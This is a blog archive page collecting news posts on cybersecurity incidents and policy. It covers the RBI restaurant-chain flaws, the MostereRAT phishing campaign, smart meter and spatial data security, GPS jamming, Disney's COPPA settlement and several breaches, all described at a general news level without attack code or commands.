Search This Blog

Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Showing posts with label Cyber Security. Show all posts

Restaurant Brands International faces cybersecurity flaws as ethical hackers expose data security risks

 

Restaurant Brands International (RBI), the parent company of Burger King, Tim Hortons, and Popeyes, has come under scrutiny after two ethical hackers uncovered major cybersecurity flaws across its digital systems. The researchers, known by their handles BobDaHacker and BobTheShoplifter, revealed how weak security practices left RBI’s global operations, spanning more than 30,000 outlets, dangerously exposed. Their findings, once detailed in a blog that has since been archived, highlight critical oversights in RBI’s approach to data security.  

Among the most concerning discoveries was a password hard-coded into the HTML of an equipment ordering site, a lapse that would typically raise alarms in even the most basic security audits. In another instance, the hackers found that the drive-through tablet system used the password “admin,” a default credential considered one of the most insecure in the industry. Such weak safeguards left RBI vulnerable to unauthorized access, calling into question the company’s investment in even the most fundamental cybersecurity measures. 

The hackers went further, demonstrating access to employee accounts, internal configurations, and raw audio files from drive-through conversations. These recordings, sometimes containing fragments of personal information, were later processed by artificial intelligence to evaluate customer interactions and staff performance. While the hackers emphasized that they did not retain or misuse any data, their ability to reach such sensitive systems underscores the potential risks had malicious actors discovered the same flaws. 

Their probe also extended into unexpected areas, such as software linked to bathroom rating screens in restaurants. While they joked about leaving fake reviews remotely, the researchers remained committed to responsible disclosure, ensuring no disruption to RBI’s operations. Nevertheless, the ease with which they navigated these systems illustrates how deeply embedded vulnerabilities had gone unnoticed. 

Other problems included APIs that allowed unrestricted sign-ups, plain-text emails containing passwords, and methods to escalate privileges to administrator access across platforms. These oversights are precisely the types of risks that established cybersecurity practices like ransomware protection and malware prevention are designed to prevent. According to the ethical hackers, RBI’s overall digital defenses could best be described as “catastrophic,” comparing them humorously to a paper Whopper wrapper in the rain. 

Although RBI reportedly addressed the vulnerabilities after being informed, the company has not publicly acknowledged the hackers or commented on the severity of the issues. This lack of transparency raises concerns about whether the incident will lead to lasting security reforms or if it will be treated as a quick fix before moving on. For a multinational corporation handling sensitive customer interactions daily, the revelations serve as a stark warning about the consequences of neglecting cybersecurity fundamentals.

MostereRAT Malware Leverages Evasion Tactics to Foil Defenders

 


Despite the fact that cybercrime has become increasingly sophisticated over the years, security researchers have uncovered a stealthy phishing campaign in which a powerful malware strain called MostereRAT was deployed. This remote access trojan allows attackers to take full control of infected systems in the same way they would normally operate them, as though they were physically a part of them. 

It has recently been revealed that the campaign is being carried out by Fortinet's FortiGuard Labs using an array of advanced evasion techniques to bypass traditional defenses and remain undetected for extended periods of time. This operation was characterized by the unconventional use of Easy Programming Language (EPL) as a visual programming tool in China that is seldom used to carry out such operations. 

Through its use, staged payloads were constructed, malicious activity was obscured, and security systems were systematically disabled. Researchers report that these phishing emails, which are primarily targeted at Japanese users with business related lures, have been shown to lead victims to booby-trapped documents embedded within ZIP archives, and this ultimately allowed the deployment of MostereRAT to be possible. 

A malware campaign designed to siphon sensitive information from a computer is incredibly sophisticated, as it extends its reach by installing secondary plugins, secures its communication with mutual TLS (mTLS), and even installs additional remote access utilities once inside a computer, highlighting the campaign's calculated design and danger of adaptability once it enters the system. 

As FortiGuard Labs identified the threat, it is believed that the campaign distinguishes itself by its layered approach to advanced evasion techniques that can make it very difficult for it to be detected. It is noteworthy that the code is written in a language called Easy Programming Language (EPL) — a simplified Chinese based programming language that is rarely used in cyberattacks — allowing attackers to conceal the malicious activity by staging the payload in multiple steps. 

With MostereRAT, a command-and-control system can be installed on an enterprise network, and it demonstrates that when deployed, it can disable security tools, block antivirus traffic, and establish encrypted communications with the C2 infrastructure, all of which are accomplished through mutual TLS (mTLS). Infection chains are initiated by phishing emails that are crafted to appear legitimate business inquiries, with a particular emphasis on Japanese users. 

In these messages, unsuspecting recipients are directed to download a Microsoft Word file that contains a hidden ZIP archive, which in turn executes a hidden payload in the form of a hidden file. Decrypting the executable's components, installing them in the system directory, and setting up persistence mechanisms, some of which operate at SYSTEM-level privileges, so that control can be maximized. 

Moreover, the malware displays a deceptive message in Simplified Chinese claiming that the file is incompatible in order to further disguise its presence. This tactic serves as a means of deflecting suspicion while encouraging recipients to try to access the file in a more secure manner. As well as these findings, researchers noted that the attack flows and associated C2 domains have been traced to infrastructure first reported by a security researcher in 2020, as part of a banking trojan. 

However, as the threat has evolved, it has evolved into a fully-fledged remote access program called MostereRAT. 

Yurren Wan, the researcher at FortiGuard Labs, emphasized that the campaign was of a high severity, primarily because it integrated multiple advanced techniques in order to allow adversaries to stay undetected while in control of compromised systems, while maintaining complete control of the system at the same time. 

Using legitimate remote access tools to disguise their activity, attackers are able to operate in plain sight by enabling security defenses and disguising activity. It was noted by Wan that one of the most distinctive aspects of this campaign is its use of unconventional methods. For example, it is coded in Easy Programming Language (EPL), intercepts and blocks antivirus traffic at the network level, and can even escalate privileges to the level of Trusted Installer—capabilities that are rarely found in standard malware attacks. 

A MostereRAT exploit can be used to record keystrokes, exfiltrate sensitive data, create hidden administrator accounts, and make use of tools such as AnyDesk and TightVNC in order to maintain persistence over the long term over a target system once it becomes active. According to Wan, defense against such intrusions requires a layered approach that combines advanced technical safeguards with sustained user awareness. 

Additionally, he said that companies should ensure that their FortiGate, FortiClient, and FortiMail deployments are protected by the latest FortiGuard security patches, while channel partners can do the same by providing guidance to customers on how to implement a managed detection and response strategy (MDR) as well as encouraging them to take advantage of training courses such as the free Fortinet Certified Fundamentals (FCF) course in order to strengthen defenses further. 

At Deepwatch, Lauren Rucker, senior cyber threat intelligence analyst, emphasized that browser security is a crucial line of defense against phishing emails that are at the heart of the campaign. In the meantime, the risk of escalation to SYSTEM or TrustedInstaller can be reduced significantly if automatic downloads are restricted and user privilege controls are tightened. As soon as MostereRAT has been installed, it utilizes multiple techniques to undermine computer security. 

As a result of mostereRAT, Microsoft Updates have been disabled, antivirus processes have been terminated, and security software cannot communicate with their servers. By impersonating the highly privileged TrustedInstaller account, the malware escalates privileges, allowing attackers to take over the system almost completely. 

James Maude, the acting chief technology officer at BeyondTrust, explained that the campaign relies on exploiting overprivileged users and endpoints that don't have strong application control as a result of combining obscure scripting languages with trusted remote access tools. 

ManyereRAT is known for maintaining extensive lists of targeted security products, such as 360 Safe, Kingsoft Antivirus, Tencent PC Manager, Windows Defender, ESET, Avira, Avast, and Malwarebytes, among others. This application utilizes Windows Filtering Platform (WFP) filters in order to block network traffic from these tools, effectively preventing them from reaching their vendors' servers to send detection alerts or telemetry. 

In addition, researchers found that another of the malware's core modules, elsedll.db, enabled robust remote access to remote computers by utilizing mutual TLS (mTLS) authentication, and supported 37 distinct commands ranging from file manipulation and payload delivery to screen capture and user identification. It is very concerning that the malware is deliberately installing and configuring legitimate software tools like AnyDesk, TightVNC, and RDP Wrapper to create hidden backdoors for long-term usage. 

To maintain exclusive control over these utilities, attackers stealthily modify the registry, conceal themselves as much as possible, and remain invisible to system users. The experts warn that the campaign represents an important evolution in remote access trojans in that it combined advanced evasion techniques with social engineering as well as legitimate tool abuse to achieve persistent compromise, highlighting the importance of maintaining a high level of security, enforcing strict endpoint controls, and providing ongoing user awareness training in order to avoid persistent compromise. 

There has been a significant evolution in cybercriminal operations, with many campaigns combining technical innovation with thoughtful planning, since the discovery of MostereRAT underscores the fact that cybercriminals have stepped beyond rudimentary malware to create sophisticated campaigns. As a company, the real challenge will be to not only deploy updated security products, but also adopt a layered, forward-looking defense strategy that anticipates such threats before they become a problem. 

A number of measures, such as tightening user privilege policies, improving browser security, as well as increasing endpoint visibility, can help minimize exposure, however, regular awareness programs remain crucial in order to reduce the success rate of phishing lures and prevent them from achieving maximum success. 

Furthermore, by partnering with managed security providers, organizations can gain access to expertise in detection, response, and continuous monitoring that are difficult to maintain in-house by most organizations. It is clear that adversaries will continue to exploit overlooked vulnerabilities and legitimate tools to their advantage in the future, which is why threats like MostereRAT are on the rise. 

In this environment, resilient defenses and cyber capabilities require more than reactive fixes; they require a culture of preparedness, disciplining operational practices, and a commitment to stay one step ahead within the context of a threat landscape that continues to grow rapidly.

Smart Meters: A Growing Target in Data Security

 



Smart electricity meters, once simple devices for recording household consumption, are now central to modern energy systems. They track usage patterns, support grid balancing, and enable predictive maintenance. But as their role has expanded, so has the volume of sensitive data they collect and store, making these devices an overlooked but critical point of vulnerability in the cybersecurity infrastructure.


Why stored data matters

Cybersecurity discussions usually focus on network protections, but the data inside the meters deserves equal attention. Information such as billing records, diagnostic logs, and configuration files can be misused if tampered with or exposed. Since smart meters often stay in use for decades, even a small compromise can quietly escalate into large-scale billing disputes, compliance failures, or inaccurate demand forecasts.


The cost of weak protection

Safeguarding these devices is not just about technology, it directly affects finances and reputation. A successful cyberattack can drain companies of thousands of dollars per minute, while also damaging customer trust and inviting regulatory penalties. At the same time, manufacturers face rising costs for secure hardware, software optimization, and the dedicated teams required to manage threats over a device’s lifetime.


New rules setting higher standards

In Europe, the upcoming Cyber Resilience Act (CRA) will set stricter requirements for digital products, including smart meters. By 2027, companies selling in the EU must ensure devices launch without known vulnerabilities, arrive with secure default settings, and receive patches throughout their lifespan. Manufacturers will also be obligated to provide transparent documentation, covering everything from software components to lifecycle support.


Building resilience into design

Experts stress that resilience must be engineered from the start. Three pillars define effective smart meter security:

1. Confidentiality: encrypting stored data and managing keys securely.

2. Integrity: ensuring information is not altered or lost during failures.

3. Authenticity: verifying updates and communications through trusted digital signatures.

Together, these measures protect the accuracy and reliability of the data on which modern energy systems depend.


Organisational readiness

Beyond technology, companies must foster a culture of security. That means maintaining software inventories (SBOMs), conducting supply chain risk assessments, preparing incident response plans, and training staff in best practices. Limiting data retention and enforcing role-based access controls reduce exposure further.

The rise of quantum computing could eventually render today’s encryption obsolete. Manufacturers are therefore urged to build cryptographic agility into devices, allowing them to adapt to stronger algorithms as standards evolve.



Czechia Warns of Chinese Data Transfers and Espionage Risks to Critical Infrastructure

 

Czechia’s National Cyber and Information Security Agency (NÚKIB) has issued a stark warning about rising cyber espionage campaigns linked to China and Russia, urging both government institutions and private companies to strengthen their security measures. The agency classified the threat as highly likely, citing particular concerns over data transfers to China and remote administration of assets from Chinese territories, including Hong Kong and Macau. According to the watchdog, these operations are part of long-term efforts by foreign states to compromise critical infrastructure, steal sensitive data, and undermine public trust. 

The agency’s concerns are rooted in China’s legal and regulatory framework, which it argues makes private data inherently insecure. Laws such as the National Intelligence Law of 2017 require all citizens and organizations to assist intelligence services, while the 2015 National Security Law and the 2013 Company Law provide broad avenues for state interference in corporate operations. Additionally, regulations introduced in 2021 obligate technology firms to report software vulnerabilities to government authorities within two days while prohibiting disclosure to foreign organizations. NÚKIB noted that these measures give Chinese state actors sweeping access to sensitive information, making foreign businesses and governments vulnerable if their data passes through Chinese systems. 

Hong Kong and Macau also fall under scrutiny in the agency’s assessment. In Hong Kong, the 2024 Safeguarding National Security Ordinance integrates Chinese security laws into its own legal system, broadening the definition of state secrets. Macau’s 2019 Cybersecurity Law grants authorities powers to monitor data transmissions from critical infrastructure in real time, with little oversight to prevent misuse. NÚKIB argues that these developments extend the Chinese government’s reach well beyond its mainland jurisdiction. 

The Czech warning gains credibility from recent attribution efforts. Earlier this year, Prague linked cyberattacks on its Ministry of Foreign Affairs to APT31, a group tied to China’s Ministry of State Security, in a campaign active since 2022. The government condemned the attacks as deliberate attempts to disrupt its institutions and confirmed a high degree of certainty about Chinese involvement, based on cooperation among domestic and international intelligence agencies. 

These warnings align with broader global moves to limit reliance on Chinese technologies. Countries such as Germany, Italy, and the Netherlands have already imposed restrictions, while the Five Eyes alliance has issued similar advisories. For Czechia, the implications are serious: NÚKIB highlighted risks across devices and systems such as smartphones, cloud services, photovoltaic inverters, and health technology, stressing that disruptions could have wide-reaching consequences. The agency’s message reflects an ongoing effort to secure its digital ecosystem against foreign influence, particularly as geopolitical tensions deepen in Europe.

Why Cybersecurity is Critical for Protecting Spatial Data



In a world where almost every service depends on digital connections, one type of information underpins much of our daily lives: spatial data. This data links activities to a place and time, revealing not just “where” something happens, but also “when,” “how,” and sometimes even “why.” Its importance spans a wide range of fields, including transportation, agriculture, climate science, disaster management, urban planning, and national security.


The power of spatial data

Spatial data is collected constantly by satellites, GPS receivers, drones, advanced sensors, and connected devices. Combined with 5G networks, cloud platforms, and artificial intelligence, this information is transformed from raw coordinates into actionable insights. It enables predictive models, smart city planning, and digital twins, virtual copies of physical systems that simulate real-world conditions. In short, spatial data is no longer static; it drives decisions in real time.


The security challenges

Its value, however, makes it a prime target for cyber threats. Three major risks stand out:

Loss of confidentiality: Unauthorized access to location data can expose sensitive details, from an individual’s daily routine to the supply routes of critical industries. This creates openings for stalking, fraud, corporate espionage, and even threats to national security.

Manipulation of data: One of the most dangerous scenarios is GPS spoofing, where attackers send fake signals to alter a device’s calculated position. If navigation systems on ships, aircraft, or autonomous vehicles are misled, the consequences can be catastrophic.

Denial of access: When spatial services are disrupted through jamming signals or cyberattacks: emergency responders, airlines, and logistics companies may be forced to halt operations. In some cases, entire networks have been shut down for days to contain breaches.

Securing spatial data requires a mix of governance, technical safeguards, and intelligence-led defences. Organizations must classify datasets by their sensitivity, since the location of a retail outlet carries far less risk than the coordinates of critical infrastructure. Training specialists to handle spatial data responsibly is equally important.

On the technical front, strong encryption, strict access controls, and continuous monitoring are basic necessities. Integrity checks and tamper detection can ensure that location records remain accurate, while well-tested recovery plans help reduce downtime in case of an incident.

Finally, intelligence-driven security shifts the focus from reacting to threats to anticipating them. By analysing attacker behaviour and emerging vulnerabilities, organizations can strengthen weak points in advance. Privacy-preserving techniques such as masking or differential privacy allow data to be used without exposing individuals. At the same time, technologies like blockchain add tamper resistance, and AI tools help detect anomalies at scale.

Spatial data has the power to make societies more efficient, resilient, and sustainable. But without strong cybersecurity, its benefits can quickly turn into risks. Recognizing its vulnerabilities and implementing layered protections is no longer optional, it is the only way to ensure that this valuable resource continues to serve people safely.



Beyond Firewalls: How U.S. Schools Are Building a Culture of Cyber Safety

 

U.S. district schools are facing a surge in sophisticated cyberattacks, but districts are pushing back by combining strong fundamentals, people-centered training, state partnerships, and community resilience planning to build cyber safety into everyday culture . 

Rising threat landscape 

An Arizona district’s 2024 near-miss shows how fast attacks unfold and why incident response planning and EDR matter; swift VPN cutoff and state-provided CrowdStrike support helped prevent damage during a live intrusion window of mere hours . 

Broader data from the 2025 CIS MS-ISAC K-12 report underscores the scale: 82% of reporting schools experienced cyber impacts between July 2023 and December 2024, with more than 9,300 confirmed incidents, reflecting increased adversary sophistication and strategic timing against educational operations . Districts hold sensitive student and family data, making identity theft, fraud, and extortion high-risk outcomes from breaches . 

AI-boosted phishing and the human firewall 

Technology leaders report that generative AI has made phishing emails far more convincing, even fooling seasoned staff, shifting emphasis to continuous, culture-wide awareness training . 

Districts are reframing users as the first line of defense, deploying role-based training through platforms like KnowBe4 and CyberNut, and reinforcing desired behaviors with incentives that make reporting suspicious emails a source of pride rather than punishment . 

This people-first approach aligns with expert guidance that “cybersecurity is really cybersafety,” requiring leadership beyond IT to model and champion safe digital practices . 

Tools, partnerships, and equity

Well-resourced or larger districts layer EDR/MDR/NDR, AI email filtering, vendor monitoring, and regular penetration testing, demonstrating rapid detection and response in live red-team exercises . 

Smaller systems rely critically on state-backed programs—such as Arizona’s Statewide Cyber Readiness Program or Indiana’s university-led assessments—that supply licenses, training, and risk guidance otherwise out of reach . 

Nationally, MS-ISAC provides no-cost incident response, advisory services, and threat intelligence, with assessments like the NCSR linked to measurable maturity gains, reinforcing the value of shared services for K-12 . 

Back to basics and resilience

Experts stress fundamentals—timely patching, account audits, strong passwords, and MFA—block a large share of intrusions, with mismanaged legacy accounts and unpatched systems frequently exploited . 

Recovery costs swing widely, but preparation and in-house response can dramatically reduce impact, while sector-wide averages show high breach costs and constrained cyber budgets that heighten the need for prioritization . 

Looking forward, districts are institutionalizing tabletop exercises, mutual aid pacts, and statewide collaboration so no school faces an incident alone, operationalizing community resilience as a strategic defense layer .

Massive database of 250 million data leaked online for public access


Around a quarter of a billion identity records were left publicly accessible, exposing people located in seven countries- Saudi Arabia, the United Arab Emirates, Canada, Mexico, South Africa, Egypt, and Turkey. 

According to experts from Cybernews, three misconfigured servers, registered in the UAE and Brazil, hosting IP addresses, contained personal information such as “government-level” identity profiles. The leaked data included contact details, dates of birth, ID numbers, and home addresses. 

Cybernews experts who found the leak said the databases seemed to have similarities with the naming conventions and structure, which hinted towards the same source. But they could not identify the actor who was responsible for running the servers. 

“These databases were likely operated by a single party, due to the similar data structures, but there’s no attribution as to who controlled the data, or any hard links proving that these instances belonged to the same party,” they said. 

The leak is particularly concerning for citizens in South Africa, Egypt, and Turkey, as the databases there contained full-spectrum data. 

The leak would have exposed the database to multiple threats, such as phishing campaigns, scams, financial fraud, and abuses.

Currently, the database is not publicly accessible (a good sign). 

This is not the first incident where a massive database holding citizen data (250 million) has been exposed online. Cybernews’ research revealed that the entire Brazilian population might have been impacted by the breach.

Earlier, a misconfigured Elasticsearch instance included the data with details such as sex,  names, dates of birth, and Cadastro de Pessoas Físicas (CPF) numbers. This number is used to identify taxpayers in Brazil. 

Russia’s Widespread GPS Jamming Raises Concerns for Air and Sea Safety

 


A recent incident involving the European Commission President’s aircraft has drawn attention to a growing risk in international travel: deliberate interference with satellite navigation systems. The plane, flying into Plovdiv, Bulgaria, temporarily lost its GPS signal due to electronic jamming but landed without issue. Bulgarian authorities later said the disruption was not unusual, describing such interference as a side effect of the ongoing war in Ukraine.

This case is not isolated. Aviation and maritime authorities across Europe have reported an increasing number of GPS disruptions since Russia’s invasion of Ukraine in 2022. Analysts estimate there have been dozens of such events in recent years, affecting flights, shipping routes, and even small private aircraft. Nordic and Baltic nations, in particular, have issued repeated warnings about interference originating near Russian borders.


How GPS jamming works

Satellite navigation relies on faint signals transmitted from orbit. Devices such as aircraft systems, cars, ships, and even smartphones calculate their exact location by comparing timing signals from multiple satellites. These signals, however, are fragile.

Jamming overwhelms the receiver with stronger radio noise, making it impossible to lock onto satellites. Spoofing takes it further by transmitting fake signals that mimic satellites, tricking receivers into reporting false positions. Both techniques have long been used in military operations. For instance, jamming can block incoming drones or missiles, while spoofing can disguise troop or aircraft movements. Experts say such technology has been used not only in Ukraine but also in other conflicts, such as alleged Israeli operations against Iranian air defenses.


Rising incidents across Europe

Countries bordering Russia report sharp increases in interference. Latvia’s communications authority documented more than 800 cases of satellite disruption in 2024, compared with only a few dozen two years earlier. Finland’s national airline even suspended flights to the Estonian city of Tartu after two aircraft struggled to land due to lost GPS guidance. Similarly, Britain’s defense secretary experienced jamming while flying near Russian territory.

The interference is not limited to aviation. Sweden has received reports of ships in the Baltic Sea losing signal, prompting officials to advise sailors to fall back on radar and landmarks. In one case, two German tourists accidentally crossed into Russian airspace in a light aircraft and had to be escorted back. Such episodes underline how civilian safety is affected by what many governments see as deliberate Russian tactics.


Risks and responses

Experts emphasize that aircraft and ships are equipped with backup systems, including radio beacons and inertial navigation, meaning total reliance on satellites is unnecessary. Yet the danger lies in moments of confusion or equipment failure, when loss of GPS could tip a situation into crisis.

Authorities are responding by restricting drone flights near interference hotspots, training crews to operate without GPS, and pressing international organizations to address the issue. While Russia dismisses complaints as political, analysts warn that disruptions serve a dual purpose: defending Russian airspace while sowing uncertainty among its neighbors.

As incidents multiply, the concern is that one miscalculation could lead to a major accident, particularly at sea, where heavy reliance on GPS has become the norm.


Disney to Pay $10 Million Fine in FTC Settlement Over Child Data Collection on YouTube

 

Disney has agreed to pay millions of dollars in penalties to resolve allegations brought by the Federal Trade Commission (FTC) that it unlawfully collected personal data from young viewers on YouTube without securing parental consent. Federal law under the Children’s Online Privacy Protection Act (COPPA) requires parental approval before companies can gather data from children under the age of 13. 

The case, filed by the U.S. Department of Justice on behalf of the FTC, accused Disney Worldwide Services Inc. and Disney Entertainment Operations LLC of failing to comply with COPPA by not properly labeling Disney videos on YouTube as “Made for Kids.” This mislabeling allegedly allowed the company to collect children’s data for targeted advertising purposes. 

“This case highlights the FTC’s commitment to upholding COPPA, which ensures that parents, not corporations, control how their children’s personal information is used online,” said FTC Chair Andrew N. Ferguson in a statement. 

As part of the settlement, Disney will pay a $10 million civil penalty and implement stricter mechanisms to notify parents and obtain consent before collecting data from underage users. The company will also be required to establish a panel to review how its YouTube content is designated. According to the FTC, these measures are intended to reshape how Disney manages child-directed content on the platform and to encourage the adoption of age verification technologies. 

The complaint explained that Disney opted to designate its content at the channel level rather than individually marking each video as “Made for Kids” or “Not Made for Kids.” This approach allegedly enabled the collection of data from child-directed videos, which YouTube then used for targeted advertising. Disney reportedly received a share of the ad revenue and, in the process, exposed children to age-inappropriate features such as autoplay.  

The FTC noted that YouTube first introduced mandatory labeling requirements for creators, including Disney, in 2019 following an earlier settlement over COPPA violations. Despite these requirements, Disney allegedly continued mislabeling its content, undermining parental safeguards. 

“The order penalizes Disney’s abuse of parental trust and sets a framework for protecting children online through mandated video review and age assurance technology,” Ferguson added. 

The settlement arrives alongside an unrelated investigation launched earlier this year by the Federal Communications Commission (FCC) into alleged hiring practices at Disney and its subsidiary ABC. While separate, the two cases add to the regulatory pressure the entertainment giant is facing. 

The Disney case underscores growing scrutiny of how major media and technology companies handle children’s privacy online, particularly as regulators push for stronger safeguards in digital environments where young audiences are most active.

Study Reveals 40% of Websites Secretly Track User Keystrokes Before Form Submission

 

Researchers from UC Davis, Maastricht University, and other institutions have uncovered widespread silent keystroke interception across websites, revealing that many sites collect user typing data before forms are ever submitted. The study examined how third-party scripts capture and share information in ways that may constitute wiretapping under California law. 

Research methodology 

The research team analyzed 15,000 websites using a custom web crawler and discovered alarming privacy practices. They found that 91 percent of sites used event listeners—JavaScript code that detects user actions like typing, clicking, or scrolling. While most event listeners serve basic functions, a significant portion monitor typing activities in real time. 

Key findings revealed that 38.5 percent of websites had third-party scripts capable of intercepting keystrokes. More concerning, 3.18 percent of sites actually transmitted intercepted keystrokes to remote servers, behavior that researchers note matches the technical definition of wiretapping under California's Invasion of Privacy Act (CIPA). 

Data collection and privacy violations 

The captured data included email addresses, phone numbers, and free text entered into forms. In documented cases, email addresses typed into forms were later used for unsolicited marketing emails, even when users never submitted the forms. Co-author Shaoor Munir emphasized that email addresses serve as stable identifiers, enabling cross-site tracking and data broker enrichment. 

Legal implications 

Legal implications center on CIPA's strict two-party consent requirement, unlike federal wiretapping laws requiring only one-party consent. The study provides evidence that some tracking practices could qualify as wiretapping, potentially enabling private lawsuits since enforcement doesn't rely solely on government action. 

Privacy risks and recommendations

Privacy risks extend beyond legal compliance. Users have minimal control over data once it leaves their browsers, with sensitive information collected and shared without disclosure. Munir highlighted scenarios where users type private information then delete it without submitting, unaware that data was still captured and transmitted to third parties. 

This practice violates user expectations on two levels: that only first-party websites access provided information, and that only submitted information reaches different parties. For organizations, customer trust erosion poses significant risks when users discover silent keystroke capture. 

The researchers recommend regulatory clarity, treating embedded analytics and session-replay vendors as third parties unless users expressly consent. They also advocate updating federal consent requirements to mirror CIPA's two-party protection standards, ensuring nationwide user privacy protection.

Exabeam Extends Proven Insider Threat Detection to AI Agents with Google Cloud

 



BROOMFIELD, Colo. & FOSTER CITY, Calif. – September 9, 2025 – At Google Cloud’s pioneering Security Innovation Forum, Exabeam, a global leader in intelligence and automation that powers security operations, today announced the integration of Google Agentspace and Google Cloud’s Model Armor telemetry into the New-Scale Security Operations Platform. This integration gives security teams the ability to monitor, detect, and respond to threats from AI agents acting as digital insiders. This visibility gives organizations insight into the behavior of autonomous agents to reveal intent, spot drift, and quickly identify compromise.

Recent findings in the “From Human to Hybrid: How AI and the Analytics Gap are Fueling Insider Risk” study from Exabeam reveal that a vast majority (93%) of organizations worldwide have either experienced or anticipate a rise in insider threats driven by AI, and 64% rank insiders as a higher concern than external threat actors. As AI agents perform tasks on behalf of users, access sensitive data, and make independent decisions, they introduce a new class of insider risk: digital actors operating beyond the scope of traditional monitoring. Just as insider threats have traditionally been classified as malicious, negligent, and compromised, AI agents now bring their own risks: malfunctioning, misaligned, or outright subverted.

SIEM and XDR solutions that are unable to baseline and learn normal behavior lack the intelligence necessary to identify when agents go rogue. As a pioneer in machine learning and behavioral analytics, Exabeam addresses this critical gap by extending its proven capabilities to monitor both human and AI agent activity. By integrating telemetry from Google Agentspace and Google Cloud’s Model Armor into the New-Scale Platform, Exabeam is expanding the boundaries of behavioral analytics and setting a new standard for what modern security platforms must deliver.

“This is a natural evolution of our leadership in insider threat detection and behavioral analytics,” said Steve Wilson, Chief AI and Product Officer at Exabeam. “Exabeam solutions are inherently designed to deliver behavioral analytics at scale. Security operations teams don’t need another tool — they need deeper insight into both human and AI agent behavior, delivered through a platform they already trust. We’re giving security teams the clarity, context, and control they need to secure the new class of insider threats.”

The company’s latest innovation, Exabeam Nova, is central to this, serving as the intelligence layer that enables security teams to interpret and act on agent behavior with confidence. Exabeam Nova delivers explainable, prioritized threat insights by analyzing the intent and execution patterns of AI agents in real time. This capability allows analysts to move beyond surface-level alerts and understand the context behind agent actions — whether they represent legitimate automation or potential misuse. By operationalizing telemetry from Google Agentspace and Google Cloud’s Model Armor in the New-Scale Platform, Exabeam Nova equips security teams to defend against the next generation of insider threats with clarity and precision.

“AI agents are quickly changing how business gets done, and that means security must evolve at the same rate,” said Chris O’Malley, CEO at Exabeam. “This is a pivotal moment for the cybersecurity industry. By extending our behavioral analytics to AI agents, Exabeam is once again leading the way in insider threat detection. We’re giving security teams the visibility and control they need to protect the integrity of their operations in an AI-driven world.”

“As businesses integrate AI into their core operations, they face a new set of security challenges,” said Vineet Bhan, Director of Security and Identity Partnerships at Google Cloud. “Our partnership with Exabeam is important to addressing this, giving customers the advanced tools needed to protect their data, maintain control, and innovate confidently in the era of AI.”

By unifying visibility across both human and AI-driven activity, Exabeam empowers security teams to detect, assess, and respond to insider threats in all their forms. This advancement sets a new benchmark for enterprise security, ensuring organizations can confidently embrace AI while maintaining control, integrity, and trust.

Cryptoexchange SwissBorg Suffers $41 Million Theft, Will Reimburse Users


According to SwissBorg, a cryptoexchange platform, $41 million worth of cryptocurrency was stolen from an external wallet used for its SOL earn strategy in a cyberattack that also affected a partner company. The company, which is based in Switzerland, acknowledged the industry reports of the attack but has stressed that the platform was not compromised. 

CEO Cyrus Fazel said that an external finance wallet of a partner was compromised. The incident happened due to hacking of the partner’s API, a process that lets software customers communicate with each other, impacting a single counterparty. It was not a compromise of SwissBorg, the company said on X. 

SwissBorg said that the hack has impacted fewer than 1% of users. “A partner API was compromised, impacting our SOL Earn Program (~193k SOL, <1% of users).  Rest assured, the SwissBorg app remains fully secure and all other funds in Earn programs are 100% safe,” it tweeted. The company said they are looking into the incident with other blockchain security firms. 

All other assets are secure and will compensate for any losses, and user balances in the SwissBorg app are not impacted. SOL Earn redemptions have been stopped as recovery efforts are undergoing. The company has also teamed up with law enforcement agencies to recover the stolen funds. A detailed report will be released after the investigations end. 

The exploit surfaced after a surge in crypto thefts, with more than $2.17 billion already stolen this year. Kiln, the partner company, released its own statement: “SwissBorg and Kiln are investigating an incident that may have involved unauthorized access to a wallet used for staking operations. The incident resulted in Solana funds being improperly removed from the wallet used for staking operations.” 

After the attack, “SwissBorg and Kiln immediately activated an incident response plan, contained the activity, and engaged our security partners,” it said in a blogpost, and that “SwissBorg has paused Solana staking transactions on the platform to ensure no other customers are impacted.”

Fazel posted a video about the incident, informing users that the platform had suffered multiple breaches in the past.

Q Day: The Quantum Threat Businesses Must Prepare For

 

Q Day represents the theoretical moment when quantum computers become powerful enough to break current cryptographic methods and render existing encryption obsolete. While experts estimate this could occur within 10-15 years, the exact timing remains uncertain since quantum computers haven't yet reached their theoretical potential. 

The growing threat 

Major companies including IBM and Google, along with governments and startups, are rapidly advancing quantum computing technology. These machines have already evolved from handling a few quantum bits to managing hundreds, becoming increasingly sophisticated at solving complex problems. Though current quantum computers cannot yet break internet encryption protocols, the consensus among experts points to Q Day's eventual arrival. 

Government agencies are taking this threat seriously. The National Institute of Standards and Technology (NIST) has standardized post-quantum cryptographic algorithms, while Europe's ENISA focuses on implementation and certification schemes. The UK National Cyber Security Centre (NCSC) has established a three-phase timeline: discovery and planning by 2028, early migration by 2031, and full migration by 2035. 

Business preparation strategy 

Organizations should avoid panic while taking proactive steps. The preparation process begins with comprehensive IT asset auditing to identify what systems exist and which assets face the highest risk, particularly those dependent on public-key encryption or requiring long-term data confidentiality. 

Following the audit, businesses must prioritize assets for migration and determine what should be retired. This inventory process provides security benefits beyond quantum preparation. 

Current standards and timing 

NIST has published three post-quantum cryptographic standards (FIPS 203, 204, and 205) with additional standards in development. However, integration into protocols and widely-used technologies remains incomplete. Industry experts recommend following ETSI's Quantum Safe Cryptography Working Group and the IETF's PQUIP group for practical implementation guidance. 

The timing challenge follows what the author calls the "Goldilocks Theory" - preparing too early risks adopting immature technologies that increase vulnerabilities, while waiting too long leaves critical systems exposed. The key involves maintaining preparedness through proper asset inventory while staying current with post-quantum standards. 

Organizations have approximately six years maximum to plan and migrate critical assets according to NCSC timelines, though Q Day could arrive sooner, later, or potentially never materialize. The emphasis should be on preparation through foresight rather than fear.

Jaguar Land Rover Hit by Cyberattack, Global Retail and Production Disrupted

 

Jaguar Land Rover (JLR), the luxury carmaker owned by Tata Motors, announced on Tuesday that its global retail and production operations have been “severely disrupted” due to a cyberattack. The company confirmed that it had shut down its systems as a precautionary measure to contain the impact.

According to AFP, the UK-based automaker said, “At this stage there is no evidence any customer data has been stolen but our retail and production activities have been severely disrupted,” adding that it is “working at pace” to restart worldwide operations.

The incident highlights the increasing vulnerability of luxury retailers and auto brands to cybercriminals. Recently, Marks and Spencer suffered a major attack that disabled its online operations for weeks, causing losses of £300 million ($402 million). Other well-known British retailers such as Harrods and Co-op have also faced cyber threats in recent months.

